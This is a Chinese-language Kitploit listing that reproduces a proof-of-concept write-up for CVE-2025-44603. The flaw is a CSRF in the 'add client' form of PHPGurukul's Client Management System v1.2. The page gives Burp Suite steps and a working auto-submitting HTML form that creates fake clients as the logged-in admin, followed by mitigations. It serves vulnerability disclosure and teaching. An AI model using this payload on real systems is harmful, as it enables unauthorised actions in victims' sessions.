Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-44603-CSRF-Leads_to_Create_FakeUsers — 展示基于 PHP 的客户管理系统中 CSRF 漏洞的概念验证,包含 HTML 漏洞利用代码和用于 Web 应用安全测试的缓解策略。 | Kitploit
工具/GitHubGitHub/moulish2004/cve-2025-44603-csrf-leads_to_create_fakeusers
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubmoulish2004/cve-2025-44603-csrf-leads_to_create_fakeusers

CVE-2025-44603-CSRF-Leads_to_Create_FakeUsers

展示基于 PHP 的客户管理系统中 CSRF 漏洞的概念验证,包含 HTML 漏洞利用代码和用于 Web 应用安全测试的缓解策略。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
121年前尚未审核
分享

CVE-2025-44603(CSRF漏洞:导致创建虚假客户)

项目名称与仓库 URL : https://phpgurukul.com/client-management-system-using-php-mysql/

漏洞名称 : 跨站请求伪造(CSRF)

受影响版本 : V1.2

简介

由 PHPGurukul 开发的客户管理系统的“添加客户”功能中存在跨站请求伪造(CSRF)漏洞。CSRF 是一种攻击方式,攻击者诱导已认证用户向 Web 应用程序提交恶意请求,从而可能导致以该用户身份执行未授权操作。在本报告中,我们演示了如何利用 CSRF 在 客户管理系统 中创建虚假用户,并提出缓解策略。

环境搭建

  • 使用 MySQL 和 PHP 在本地托管的 客户管理系统。
  • 提供添加客户及其服务的功能。

利用 CSRF 的步骤

1. 以管理员身份登录

使用提供的凭据登录客户管理系统。

以管理员身份登录

2. 添加新客户

  • 选择 添加客户 选项。
  • 输入所需的客户详细信息。

添加新客户

输入客户详细信息

3. 捕获添加客户请求

  1. 导航到 保存 按钮。
  2. 设置 Burp Suite 拦截请求。
  3. 点击 保存,在请求到达服务器之前捕获 HTTP 请求。
  4. 将捕获的请求发送到 Repeater 选项卡,在移除会话 Cookie 的情况下进行分析。

在 Burp 中捕获请求 发送到 Repeater

用于创建虚假客户的 CSRF 代码

以下是针对 CSRF 攻击的 HTML PoC:

root@kitploit:~
<html>
  <body>
    <form action="http://localhost/clientms/admin/add-client.php" method="POST">
      <input type="hidden" name="accounttype" value="Active Account" />
      <input type="hidden" name="cname" value="moulimurugan" />
      <input type="hidden" name="comname" value="kppr" />
      <input type="hidden" name="address" value="vijayamangalam" />
      <input type="hidden" name="city" value="erode" />
      <input type="hidden" name="state" value="tamil" />
      <input type="hidden" name="zcode" value="638026" />
      <input type="hidden" name="wphnumber" value="968560710" />
      <input type="hidden" name="cellphnumber" value="6931052465" />
      <input type="hidden" name="ophnumber" value="9638560410" />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="password" value="moulimurugan" />
      <input type="hidden" name="websiteadd" value="clientmsdb" />
      <input type="hidden" name="notes" value="Nil" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

创建虚假客户

  • 修改现有详细信息以创建 虚假客户

添加虚假用户 1 添加虚假用户 2

测试 CSRF PoC

  1. 在浏览器中打开生成的 CSRF PoC 链接。
  2. 网页会显示一个 提交 按钮。
  3. 点击 提交,请求即被执行,从而创建虚假客户。

在浏览器中打开 PoC 点击提交请求

确认虚假客户的创建

  • 提交后,虚假客户会出现在管理员仪表板中。

已创建虚假客户 已创建多个用户

缓解策略

为防止 CSRF 攻击,请实施以下措施:

  1. CSRF 令牌
    • 在所有表单提交中使用 反 CSRF 令牌,并在服务器端进行验证。
  2. SameSite Cookie
    • 将会话 Cookie 设置为 SameSite=Strict 或 SameSite=Lax 属性。
  3. Referer 与 Origin 请求头验证
    • 在处理请求之前,验证 Referer 和 Origin 请求头。
  4. 用户身份验证检查
    • 对关键操作要求 CAPTCHA,以防止自动化攻击。
  5. 限制 HTTP 方法
    • 对敏感操作使用 POST,避免处理带有副作用的 GET 请求。

结论

本报告演示了如何利用 CSRF 漏洞在 客户管理系统 中创建未经授权的客户。实施上述缓解策略将有助于保护应用程序免受此类攻击。

下载工具